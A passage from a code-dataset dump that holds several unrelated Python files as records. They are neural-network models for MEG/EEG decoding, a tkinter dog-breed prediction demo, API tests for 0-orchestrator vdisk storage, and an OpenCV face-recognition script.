np.arange(len(np.unique(y_true)))\n tick_marks = np.arange(len(class_names))\n plt.xticks(tick_marks, class_names, rotation=45)\n plt.yticks(tick_marks, class_names)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n return f\n\n\nclass VGG19(Model):\n \"\"\"\n VGG-19 model.\n\n References\n ----------\n\n \"\"\"\n def __init__(self, Dataset, Optimizer, specs):\n super().__init__(Dataset, Optimizer, specs)\n self.specs.update(nonlin_out=tf.nn.relu, inch=1,\n padding='SAME', filter_length=(3, 3),\n domain='2d', stride=1, pooling=1, conv_type='2d')\n self.scope = 'vgg19'\n\n def build_graph(self):\n X1 = tf.expand_dims(self.X, -1)\n if X1.shape[1] == 306:\n X1 = tf.concat([X1[:, 0:306:3, :],\n X1[:, 1:306:3, :],\n X1[:, 2:306:3, :]], axis=3)\n self.specs['inch'] = 3\n\n vgg1 = vgg_block(2, ConvDSV, self.specs)\n out1 = vgg1(X1)\n\n self.specs['inch'] = self.specs['n_ls']\n self.specs['n_ls'] *= 2\n vgg2 = vgg_block(2, ConvDSV, self.specs)\n out2 = vgg2(out1)\n#\n self.specs['inch'] = self.specs['n_ls']\n self.specs['n_ls'] *= 2\n vgg3 = vgg_block(4, ConvDSV, self.specs)\n out3 = vgg3(out2)\n\n self.specs['inch'] = self.specs['n_ls']\n self.specs['n_ls'] *= 2\n vgg4 = vgg_block(4, ConvDSV, self.specs)\n out4 = vgg4(out3)\n#\n self.specs['inch'] = self.specs['n_ls']\n vgg5 = 
vgg_block(4, ConvDSV, self.specs)\n out5 = vgg5(out4)\n\n#\n fc_1 = Dense(size=4096, nonlin=tf.nn.relu, dropout=self.rate)\n fc_2 = Dense(size=4096, nonlin=tf.nn.relu, dropout=self.rate)\n fc_out = Dense(size=self.n_classes, nonlin=tf.identity,\n dropout=self.rate)\n y_pred = fc_out(fc_2(fc_1(out5)))\n return y_pred\n\n\nclass EEGNet(Model):\n \"\"\"EEGNet\n\n Parameters\n ----------\n eegnet_params : dict\n\n n_ls : int\n number of (temporal) convolution kernrels in the first layer.\n Defaults to 8\n\n filter_length : int\n length of temporal filters in the first layer.\n Defaults to 32\n\n stride : int\n stride of the average polling layers. Defaults to 4.\n\n pooling : int\n pooling factor of the average polling layers. Defaults to 4.\n\n dropout : float\n dropout coefficient\n\n References\n ----------\n [1] V.J. Lawhern, et al., EEGNet: A compact convolutional neural network\n for EEG-based brain–computer interfaces 10 J. Neural Eng., 15 (5) (2018),\n p. 056013\n\n [2] Original EEGNet implementation by the authors can be found at\n https://github.com/vlawhern/arl-eegmodels\n \"\"\"\n\n def build_graph(self):\n self.scope = 'eegnet'\n\n X1 = tf.expand_dims(self.X, -1)\n vc1 = ConvDSV(n_ls=self.specs['n_ls'], nonlin=tf.identity, inch=1,\n filter_length=self.specs['filter_length'], domain='time',\n stride=1, pooling=1, conv_type='2d')\n vc1o = vc1(X1)\n bn1 = tf.layers.batch_normalization(vc1o)\n dwc1 = ConvDSV(n_ls=1, nonlin=tf.identity, inch=self.specs['n_ls'],\n padding='VALID', filter_length=bn1.get_shape()[1].value,\n domain='space', stride=1, pooling=1,\n conv_type='depthwise')\n dwc1o = dwc1(bn1)\n bn2 = tf.layers.batch_normalization(dwc1o)\n out2 = tf.nn.elu(bn2)\n out22 = tf.nn.dropout(out2, self.rate)\n\n sc1 = ConvDSV(n_ls=self.specs['n_ls'], nonlin=tf.identity,\n inch=self.specs['n_ls'],\n filter_length=self.specs['filter_length']//4,\n domain='time', stride=1, pooling=1,\n conv_type='separable')\n\n sc1o = sc1(out22)\n bn3 = tf.layers.batch_normalization(sc1o)\n out3 = tf.nn.elu(bn3)\n out4 = tf.nn.avg_pool(out3, [1, 1, self.specs['pooling'], 1],\n [1, 1, self.specs['stride'], 1], 'SAME')\n out44 = tf.nn.dropout(out4, self.rate)\n\n sc2 = ConvDSV(n_ls=self.specs['n_ls']*2, nonlin=tf.identity,\n inch=self.specs['n_ls'],\n filter_length=self.specs['filter_length']//4,\n domain='time', stride=1, pooling=1,\n conv_type='separable')\n sc2o = sc2(out44)\n bn4 = tf.layers.batch_normalization(sc2o)\n out5 = tf.nn.elu(bn4)\n out6 = tf.nn.avg_pool(out5, [1, 1, self.specs['pooling'], 1],\n [1, 1, self.specs['stride'], 1], 'SAME')\n out66 = tf.nn.dropout(out6, self.rate)\n\n out7 = tf.reshape(out66, [-1, np.prod(out66.shape[1:])])\n fc_out = Dense(size=self.n_classes, nonlin=tf.identity,\n dropout=self.rate)\n y_pred = fc_out(out7)\n return y_pred\n\n\nclass LFCNN(Model):\n\n \"\"\"\n LF-CNN. Includes basic paramter interpretation options.\n\n For details see [1].\n\n Parameters\n ----------\n n_ls : int\n number of latent components\n Defaults to 32\n\n filter_length : int\n length of spatio-temporal kernels in the temporal\n convolution layer. Defaults to 7\n\n stride : int\n stride of the max pooling layer. Defaults to 1\n\n pooling : int\n pooling factor of the max pooling layer. Defaults to 2\n\n References\n ----------\n [1] I. Zubarev, et al., Adaptive neural network classifier for\n decoding MEG signals. Neuroimage. 
(2019) May 4;197:425-434\n \"\"\"\n\n def build_graph(self):\n \"\"\"\n Build computational graph using defined placeholder self.X as input\n\n Returns\n --------\n y_pred : tf.Tensor\n output of the forward pass of the computational graph.\n prediction of the target variable\n\n \"\"\"\n self.scope = 'lf-cnn'\n self.demix = DeMixing(n_ls=self.specs['n_ls'])\n\n self.tconv1 = LFTConv(scope=\"conv\", n_ls=self.specs['n_ls'],\n nonlin_out=tf.nn.relu,\n filter_length=self.specs['filter_length'],\n stride=self.specs['stride'],\n pooling=self.specs['pooling'],\n padding=self.specs['padding'])\n\n self.fin_fc = Dense(size=self.n_classes,\n nonlin=tf.identity, dropout=self.rate)\n\n y_pred = self.fin_fc(self.tconv1(self.demix(self.X)))\n return y_pred\n\n def plot_out_weights(self):\n \"\"\"\n Plots the weights of the output layer\n\n \"\"\"\n from matplotlib import pyplot as plt\n\n f, ax = plt.subplots(1, self.n_classes)\n for i in range(self.n_classes):\n F = self.out_weights[..., i]\n times = self.specs['stride']*np.arange(F.shape[-1])/float(self.fs)\n t_step = np.diff(times)[0]\n pat, t = np.where(F == np.max(F))\n ax[i].pcolor(times, np.arange(self.specs['n_ls']), F, cmap='bone_r')\n ax[i].plot(times[t]+.5*t_step, pat+.5, markeredgecolor='red',\n markerfacecolor='none', marker='s', markersize=10,\n markeredgewidth=2)\n plt.show()\n\n def compute_patterns(self, megdata=None, output='patterns'):\n \"\"\"\n Computes spatial patterns from filter weights.\n\n Required for visualization.\n \"\"\"\n\n vis_dict = {self.handle: self.train_handle, self.rate: 1}\n spatial = self.sess.run(self.demix.W, feed_dict=vis_dict)\n self.filters = np.squeeze(self.sess.run(self.tconv1.filters,\n feed_dict=vis_dict))\n self.patterns = spatial\n\n if 'patterns' in output:\n data = self.sess.run(self.X, feed_dict=vis_dict)\n data = data.transpose([0, 2, 1])\n data = data.reshape([-1, data.shape[-1]])\n self.dcov, _ = ledoit_wolf(data)\n self.patterns = np.dot(self.dcov, self.patterns)\n if 'full' in output:\n lat_cov, _ = ledoit_wolf(np.dot(data, spatial))\n self.lat_prec = np.linalg.inv(lat_cov)\n self.patterns = np.dot(self.patterns, self.lat_prec)\n self.out_weights, self.out_biases = self.sess.run([self.fin_fc.w, self.fin_fc.b], feed_dict=vis_dict)\n self.out_weights = np.reshape(self.out_weights,\n [self.specs['n_ls'], -1, self.n_classes])\n\n def plot_patterns(self, sensor_layout='Vectorview-grad', sorting='l2',\n spectra=True, fs=None, scale=False, names=False):\n \"\"\"\n Plot informative spatial activation patterns for each class of stimuli\n\n Parameters\n ----------\n\n sensor_layout : str or mne.channels.Layout\n sensor layout. See mne.channels.read_layout for details\n\n sorting : str, optional\n\n spectra : bool, optional\n If True will also plot frequency responses of the associated\n temporal filters. Defaults to True\n\n fs : float\n sampling frequency\n\n scale : bool, optional\n If True will min-max scale the output. 
Defaults to False\n\n names : list of str, optional\n Class names\n\n Returns\n -------\n\n Figure\n\n \"\"\"\n from mne import channels, evoked, create_info\n import matplotlib.pyplot as plt\n from scipy.signal import freqz\n self.ts = []\n lo = channels.read_layout(sensor_layout)\n info = create_info(lo.names, 1., sensor_layout.split('-')[-1])\n self.fake_evoked = evoked.EvokedArray(self.patterns, info)\n nfilt = min(self.n_classes, 8)\n if sorting == 'l2':\n order = np.argsort(np.linalg.norm(self.patterns, axis=0, ord=2))\n elif sorting == 'l1':\n order = np.argsort(np.linalg.norm(self.patterns, axis=0, ord=1))\n elif sorting == 'contribution':\n nfilt = 3\n order = []\n for i in range(self.n_classes):\n inds = np.argsort(self.out_weights[..., i].sum(-1))[::-1]\n order += list(inds[:nfilt])\n order = np.array(order)\n elif sorting == 'best_spatial':\n nfilt = self.n_classes\n order = []\n for i in range(self.n_classes):\n pat = np.argmax(self.out_weights[..., i].sum(-1))\n order.append(pat)\n order = np.array(order)\n elif sorting == 'best':\n nfilt = self.n_classes\n order = []\n for i in range(self.n_classes):\n pat, t = np.where(self.out_weights[..., i] == np.max(self.out_weights[..., i]))\n order.append(pat[0])\n self.ts.append(t)\n order = np.array(order)\n elif sorting == 'best_neg':\n nfilt = self.n_classes\n order = []\n for i in range(self.n_classes):\n pat = np.argmin(self.out_weights[..., i].sum(-1))\n order.append(pat)\n elif sorting == 'worst':\n nfilt = self.n_classes\n order = []\n weight_sum = np.sum(np.abs(self.out_weights).sum(-1), -1)\n pat = np.argsort(weight_sum)\n order = np.array(pat[:nfilt])\n\n elif isinstance(sorting, list):\n nfilt = len(sorting)\n order = np.array(sorting)\n else:\n order = np.arange(self.specs['n_ls'])\n self.fake_evoked.data[:, :len(order)] = self.fake_evoked.data[:, order]\n if scale:\n self.fake_evoked.data[:, :len(order)] /= self.fake_evoked.data[:, :len(order)].max(0)\n self.fake_evoked.data[:, len(order):] *= 0\n self.out_filters = self.filters[:, order]\n order = np.array(order)\n if spectra:\n z = 2\n else:\n z = 1\n nrows = max(1, len(order)//nfilt)\n ncols = min(nfilt, len(order))\n\n f, ax = plt.subplots(z*nrows, ncols, sharey=True)\n f.set_size_inches([16,9])\n ax = np.atleast_2d(ax)\n for i in range(nrows):\n if spectra:\n for jj, flt in enumerate(self.out_filters[:, i*ncols:(i+1)*ncols].T):\n w, h = freqz(flt, 1)\n ax[z*i+1, jj].plot(w/np.pi*self.fs/2, np.abs(h))\n\n self.fake_evoked.plot_topomap(times=np.arange(i*ncols, (i+1)*ncols, 1.),\n axes=ax[z*i], colorbar=False,\n vmax=np.percentile(self.fake_evoked.data[:, :len(order)], 99),\n scalings=1, time_format='class # %g',\n title='Informative patterns ('+sorting+')')\n\n return f\n\n\nclass VARCNN(Model):\n\n \"\"\"VAR-CNN\n\n For details see [1].\n\n Parameters\n ----------\n n_ls : int\n number of latent components\n Defaults to 32\n\n filter_length : int\n length of spatio-temporal kernels in the temporal\n convolution layer. Defaults to 7\n\n stride : int\n stride of the max pooling layer. Defaults to 1\n\n pooling : int\n pooling factor of the max pooling layer. Defaults to 2\n\n References\n ----------\n [1] I. Zubarev, et al., Adaptive neural network classifier for\n decoding MEG signals. Neuroimage. 
(2019) May 4;197:425-434\n \"\"\"\n\n def build_graph(self):\n self.scope = 'var-cnn'\n self.demix = DeMixing(n_ls=self.specs['n_ls'])\n\n self.tconv1 = VARConv(scope=\"conv\", n_ls=self.specs['n_ls'],\n nonlin_out=tf.nn.relu,\n filter_length=self.specs['filter_length'],\n stride=self.specs['stride'],\n pooling=self.specs['pooling'],\n padding=self.specs['padding'])\n\n self.fin_fc = Dense(size=self.n_classes,\n nonlin=tf.identity, dropout=self.rate)\n\n y_pred = self.fin_fc(self.tconv1(self.demix(self.X)))\n\n return y_pred","sub_path":"mneflow/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":26133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"574910485","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 19 13:07:59 2020\n\n@author: Antoine\n\"\"\"\n\nfrom tkinter import *\nimport pandas as pd\nimport numpy as np\nfrom PIL import ImageTk\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import applications\n\n# Chargement du modele Keras\ntl_model = load_model('resultats/modeles_retenus/trl_classifier_inception.h5')\n\n# Chargement du mapping numero de classe / race de chien\nlabels = pd.read_csv('demo_data/dog_breed_mapping.csv', index_col='key')\n\n# Fonction activee lors de l'appui sur le boutton\n# \"Predire la race\"\ndef predict():\n \n global img_tk\n \n # Recupere le nom du chien (fichier) pour lequel faire une prediction\n file_loc = E1.get()\n \n # Chargement de l'image du chien\n img = load_img('demo_data/images/' + file_loc + '.jpg')\n width, height = img.size\n \n # Preprocessing de l'image\n preprocessed_img = applications.inception_v3.preprocess_input(img_to_array(img))\n preprocessed_img = np.expand_dims(preprocessed_img, axis=0) \n \n # Prediction des pobabilites pour chaque classe\n # et choix de la classe la plus probable\n prediction = tl_model.predict(preprocessed_img)\n breed_prob = prediction.max()\n breed_pred = labels.loc[np.argmax(prediction, axis=1)[0], 'breed']\n print(breed_pred)\n \n # Conversion de l'image du chien en format utilise par TKinter\n img_tk = ImageTk.PhotoImage(img)\n # Creation de la fenetre qui contiendra l'image du chien\n image_display = Toplevel(fenetre)\n \n # Affichage de l'image choisie\n canvas = Canvas(image_display, width = width, height = height)\n canvas.create_image((0, 0),anchor=NW, image=img_tk)\n canvas.pack(side = BOTTOM, padx=5, pady=5)\n\n # Affichage de la prediction de la race au dessus de l'image\n L2_text = file_loc + ' est probablement un ' + breed_pred + ' (p = ' + str(breed_prob)[:4] + ')'\n L2 = Label(image_display, text=L2_text)\n L2.pack( side = TOP, padx=5, pady=5)\n\n# Creation de la fenetre principale de l'interface\nfenetre = Tk()\n\nL1 = Label(fenetre, text = \"Nom du chien\")\nL1.pack( side = LEFT)\n\nB = Button(fenetre, text = \"Predire la race\", command = predict)\nB.pack(side = RIGHT)\n\nfile_loc = StringVar()\nfile_loc.set('hector')\nE1 = Entry(fenetre, textvariable=file_loc , bd = 3, width=30)\nE1.pack(side = RIGHT)\n\n\n\nfenetre.mainloop()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"554510360","text":"import random, time\nfrom testcases.testcases_base import TestcasesBase\nimport unittest\n\n\nclass TestVdisks(TestcasesBase):\n\n @classmethod\n def setUpClass(cls):\n self = cls()\n 
super(TestVdisks, self).setUp()\n TestcasesBase().setUp()\n \n nodes = [self.nodeid]\n number_of_free_disks, disk_type = self.get_max_available_free_disks(nodes)\n storageclusters = self.storageclusters_api.get_storageclusters()\n if not storageclusters.json():\n if not number_of_free_disks:\n self.skipTest('[*] No free disks to create storagecluster')\n\n self.lg.info('[*] Deploy new storage cluster (SC0)')\n response, data = self.storageclusters_api.post_storageclusters(\n nodes=nodes,\n driveType=disk_type,\n servers=random.randint(1, number_of_free_disks)\n )\n self.assertEqual(response.status_code, 201)\n storagecluster = data['label']\n else:\n storagecluster = storageclusters.json()[0]\n\n self.lg.info('[*] Create vdiskstorage (VDS0)')\n response, vdiskstoragedata = self.vdisks_api.post_vdiskstorage(storagecluster=storagecluster)\n self.assertEqual(response.status_code, 201)\n\n self.lg.info('[*] Import Image (IMG0) for (VDS0)')\n response, imagedata = self.vdisks_api.post_import_image(vdiskstorageid=vdiskstoragedata['id'])\n self.assertEqual(response.status_code, 201)\n\n TestVdisks.vdiskstoragedata = vdiskstoragedata\n TestVdisks.imagedata = imagedata \n\n @classmethod\n def tearDownClass(cls):\n self = cls()\n self.lg.info('[*] Delete imported image')\n self.vdisks_api.delete_image(TestVdisks.vdiskstoragedata['id'], TestVdisks.imagedata['imageName'])\n self.lg.info('[*] Delete vdiskstorage')\n self.vdisks_api.delete_vdiskstorage(TestVdisks.vdiskstoragedata['id'])\n super(TestVdisks, cls).tearDownClass()\n\n def setUp(self):\n super().setUp()\n self.lg.info(' [*] Create vdisk (VD0)')\n response, self.data = self.vdisks_api.post_vdisks(\n vdiskstorageid=self.vdiskstoragedata['id'], \n imageid=self.imagedata['imageName']\n )\n self.assertEqual(response.status_code, 201)\n\n def tearDown(self):\n self.lg.info(' [*] Delete vdisk (VD0)')\n self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata['id'], self.data['id'])\n super().tearDown()\n\n def test001_get_vdisk_details(self):\n \"\"\" GAT-061\n *GET:/vdisks/{vdiskid}*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. Get vdisk (VD0), should succeed with 200.\n #. Get nonexisting vdisk, should fail with 404.\n\n \"\"\"\n self.lg.info(' [*] Get vdisk (VD0), should succeed with 200')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 200)\n for key in self.data.keys():\n if key in list(response.json().keys()):\n self.assertEqual(self.data[key], response.json()[key])\n self.assertEqual(response.json()['status'], 'halted')\n\n self.lg.info(' [*] Get nonexisting vdisk, should fail with 404')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.rand_str())\n self.assertEqual(response.status_code, 404)\n\n def test002_list_vdisks(self):\n \"\"\" GAT-062\n *GET:/vdisks*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. List vdisks, should succeed with 200.\n\n \"\"\"\n self.lg.info(' [*] List vdisks, should succeed with 200')\n response = self.vdisks_api.get_vdisks(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n vd0_data = {\"id\": self.data['id'],\n \"vdiskstorage\": self.vdiskstoragedata[\"id\"],\n \"type\": self.data['type']\n }\n self.assertIn(vd0_data, response.json())\n\n def test003_create_vdisk(self):\n \"\"\" GAT-063\n *POST:/vdisks*\n\n **Test Scenario:**\n\n #. Create vdisk (VD1). should succeed with 201.\n #. List vdisks, (VD1) should be listed.\n #. 
Create vdisk with invalid body, should fail with 400.\n \"\"\"\n self.lg.info(' [*] List vdisks, (VD1) should be listed')\n response = self.vdisks_api.get_vdisks(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n self.assertIn(self.data['id'], [x['id'] for x in response.json()])\n\n self.lg.info(' [*] Create vdisk with invalid body, should fail with 400')\n body = {\"id\": self.rand_str(),\"type\":\"cash\", \"imageId\":self.imagedata[\"imageName\"]}\n response, data= self.vdisks_api.post_vdisks(vdiskstorageid=self.vdiskstoragedata[\"id\"],** body)\n self.assertEqual(response.status_code, 400)\n\n def test004_delete_vdisk(self):\n \"\"\" GAT-064\n *Delete:/vdisks/{vdiskid}*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. Delete vdisk (VD0), should succeed with 204.\n #. List vdisks, (VD0) should be gone.\n #. Delete nonexisting vdisk, should fail with 204.\n \"\"\"\n self.lg.info(' [*] Delete vdisk (VD0), should succeed with 204')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info(' [*] List vdisks, (VD0) should be gone')\n response = self.vdisks_api.get_vdisks(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n self.assertNotIn(self.data['id'], [x['id'] for x in response.json()])\n\n self.lg.info(' [*] Delete nonexisting vdisk, should fail with 204')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], 'fake_vdisk')\n self.assertEqual(response.status_code, 204)\n\n def test005_resize_vdisk(self):\n \"\"\" GAT-065\n *POST:/vdisks/{vdiskid}/resize*\n\n **Test Scenario:**\n\n #. Create vdisk (VD0).\n #. Resize vdisk (VD0), should succeed with 204.\n #. Check that size of volume changed, should succeed.\n #. Resize vdisk (VD0) with value less than the current vdisk size, should fail with 400.\n #. Check vdisk (VD0) size, shouldn't be changed.\n\n \"\"\"\n self.lg.info(' [*] Resize vdisk (VD0), should succeed with 204')\n current_size = self.data['size']\n new_size = current_size + random.randint(1, 10)\n body = {\"newSize\": new_size}\n response = self.vdisks_api.post_vdisks_vdiskid_resize(self.vdiskstoragedata[\"id\"],self.data['id'], body)\n self.assertEqual(response.status_code, 204)\n\n self.lg.info(' [*] Check that size of volume changed, should succeed')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"],self.data['id'])\n self.assertEqual(response.status_code, 200)\n self.assertEqual(new_size, response.json()['size'])\n current_size = new_size\n\n self.lg.info(' [*] Resize vdisk (VD0) with value less than the current vdisk size, should fail with 400')\n new_size = current_size - random.randint(1, current_size - 1)\n body = {\"newSize\": new_size}\n response = self.vdisks_api.post_vdisks_vdiskid_resize(self.vdiskstoragedata[\"id\"],self.data['id'], body)\n self.assertEqual(response.status_code, 400)\n\n self.lg.info(' [*] Check vdisk (VD0) size, shouldn\\'t be changed')\n response = self.vdisks_api.get_vdisks_vdiskid(self.vdiskstoragedata[\"id\"],self.data['id'])\n self.assertEqual(response.status_code, 200)\n self.assertNotEqual(new_size, response.json()['size'])\n\n @unittest.skip(' https://github.com/zero-os/0-orchestrator/issues/1260')\n def test006_list_delete_vdiskstorage(self):\n \"\"\" GAT-143\n *GET:/vdiskstorage*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0), import image (IM0) and create vdisk (VD0).\n #. 
Delete vdiskStorage (VDS0), should fail with 400 as VDS0 consume IM0 and VD0.\n #. List vdisksStorage, should succeed with 200.\n #. Delete vdisk (VD0) and image (IM0), should succeed\n #. Delete vdiskStorage (VDS0), should succeed with 204.\n #. List vdisks, (VDS0) should be gone.\n #. Delete nonexisting vdisk, should fail with 204.\n\n \"\"\"\n self.lg.info(' [*] List vdisksStorage, should succeed with 200')\n response = self.vdisks_api.get_vdiskstorage()\n self.assertEqual(response.status_code, 200)\n svd0_data = {\"id\": self.vdiskstoragedata['id'],\n \"blockCluster\": self.vdiskstoragedata['blockCluster'],\n \"objectCluster\": '',\n \"slaveCluster\": ''}\n self.assertIn(svd0_data, response.json())\n\n self.lg.info('Delete vdiskStorage (VDS0), should fail with 400 as VDS0 consume IM0 and VD0')\n response = self.vdisks_api.delete_vdiskstorage(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 400)\n\n self.lg.info(' [*] Delete vdisk (VD0)')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info(' [*] Delete Image (IMG0)')\n response = self.vdisks_api.delete_image(self.vdiskstoragedata[\"id\"], self.imagedata['imageName'])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info('Delete vdiskStorage (VDS0), should succeed with 204')\n response = self.vdisks_api.delete_vdiskstorage(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info('List vdiskStorages, (VDS0) should be gone')\n response = self.vdisks_api.get_vdiskstorage()\n self.assertEqual(response.status_code, 200)\n self.assertNotIn(svd0_data, response.json())\n\n self.lg.info('Delete nonexisting vdiskStorage, should fail with 204')\n response = self.vdisks_api.delete_vdiskstorage(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 204)\n\n @unittest.skip(\"https://github.com/zero-os/0-orchestrator/issues/1148\")\n def test007_list_vdisk_images(self):\n \"\"\" GAT-144\n *GET:/vdisks_Images*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0).\n #. Import Image IMG0.\n #. List all vdiskstorage images, should succeed with 200.\n\n \"\"\"\n self.lg.info(' [*] List all vdiskstorage Images, should succeed with 200')\n response = self.vdisks_api.get_import_images(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n img0_data = {\"name\": self.imagedata[\"imageName\"],\n \"size\": self.imagedata['size'],\n \"diskBlockSize\": self.imagedata['diskBlockSize']\n }\n self.assertIn(img0_data, response.json())\n\n def test008_get_vdiskstorage_details(self):\n \"\"\" GAT-145\n *GET:/vdiskstorage/{vdiskstorageid}*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0).\n #. Get vdiskstorage (VDS0), should succeed with 200.\n #. 
Get nonexisting vdiskstorage, should fail with 404.\n\n \"\"\"\n self.lg.info(' [*] Get vdisk (VDS0), should succeed with 200')\n response = self.vdisks_api.get_vdiskstorage_info(self.vdiskstoragedata[\"id\"])\n self.assertEqual(response.status_code, 200)\n for key in self.vdiskstoragedata.keys():\n if key in list(response.json().keys()):\n self.assertEqual(self.vdiskstoragedata[key], response.json()[key])\n self.lg.info(' [*] Get nonexisting vdiskstorage, should fail with 404')\n response = self.vdisks_api.get_vdiskstorage_info(self.rand_str())\n self.assertEqual(response.status_code, 404)\n\n @unittest.skip('https://github.com/zero-os/0-orchestrator/issues/1148')\n def test009_get_Imported_Image_details(self):\n \"\"\" GAT-146\n *GET:/vdiskstorage/{vdiskstorageid}*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0).\n #. Import Image IMG0.\n #. Get Imported Image(IMG0), should succeed with 200.\n #. Get nonexisting image, should fail with 404.\n\n \"\"\"\n\n self.lg.info('Get Imported Image(IMG0), should succeed with 200.')\n response = self.vdisks_api.get_image_info(self.vdiskstoragedata[\"id\"], self.imagedata[\"imageName\"])\n self.assertEqual(response.status_code, 200)\n for key in self.imagedata.keys():\n if key in list(response.json().keys()):\n self.assertEqual(self.imagedata[key], response.json()[key])\n\n self.lg.info(' [*] Get nonexisting image, should fail with 404')\n fake_image = self.rand_str()\n response = self.vdisks_api.get_image_info(self.vdiskstoragedata[\"id\"], fake_image)\n self.assertEqual(response.status_code, 404)\n\n def test010_delete_vdisk_attached_to_vm(self):\n \"\"\" GAT-155\n *DELETE:/vdisks/{vdiskid}*\n\n **Test Scenario:**\n\n #. Create vdiskstorage (VDS0), should succeed.\n #. Import image (IMG0) to vdiskstorage (VDS0), should succeed.\n #. Create vdisk (VD0) with image (IMG0), should succeed.\n #. Create virtual machine (VM0), should succeed.\n #. Delete vdisk (VD0), should fail as virtual machine (VM0) is attached to it.\n #. Delete virtual machine (VM0), should succeed.\n #. Delete vdisk (VD0), should succeed.\n\n \"\"\"\n self.lg.info('Create virtual machine (VM0), should succeed')\n disks = [{\"vdiskid\": self.data['id'], \"maxIOps\": 2000}]\n response, vmdata = self.vms_api.post_nodes_vms(node_id=self.nodeid, memory=1024, cpu=1, disks=disks)\n self.assertEqual(response.status_code, 201)\n\n self.lg.info('Delete vdisk (VD0), should fail as virtual machine (VM0) is attached to it')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 400)\n\n self.lg.info('Delete virtual machine (VM0), should succeed')\n response = self.vms_api.delete_nodes_vms_vmid(self.nodeid, vmdata['id'])\n self.assertEqual(response.status_code, 204)\n\n self.lg.info('Delete vdisk (VD0), should succeed')\n response = self.vdisks_api.delete_vdisks_vdiskid(self.vdiskstoragedata[\"id\"], self.data['id'])\n self.assertEqual(response.status_code, 204)\n\n","sub_path":"tests/0_orchestrator/test_suite/testcases/basic_tests/test06_vdisks_apis.py","file_name":"test06_vdisks_apis.py","file_ext":"py","file_size_in_byte":14644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"145656644","text":"import cv2\nimport winsound\n\n# zero (0) is for a single camera; if you have multiple cameras you can change it to 1, 2, 3, 4, 
etc.\ncam = cv2.VideoCapture(0,cv2.CAP_DSHOW)\nwhile cam.isOpened(): \n haar_cascade = cv2.CascadeClassifier('haar_face.xml')\n\n people = ['pp']\n # features = np.load('features.npy', allow_pickle=True)\n # labels = np.load('labels.npy')\n\n face_recognizer = cv2.face.LBPHFaceRecognizer_create()\n face_recognizer.read('face_trained.yml')\n\n img = cv2.imread(r'F:\\pic\\riz.jpg')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Person', gray)\n\n # Detect the face in the image\n faces_rect = haar_cascade.detectMultiScale(gray, 1.1, 4)\n\n for (x,y,w,h) in faces_rect:\n faces_roi = gray[y:y+h,x:x+w]\n\n label, confidence = face_recognizer.predict(faces_roi)\n print(f'Label = {people[label]} with a confidence of {confidence}')\n\n cv2.putText(img, str(people[label]), (20,20), cv2.FONT_HERSHEY_COMPLEX, 1.0, (0,255,0), thickness=2)\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), thickness=2)\n\n cv2.imshow('Detected Face', img)\n if cv2.waitKey(10) == ord('q'):\n break\n","sub_path":"Face Recgnition/face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
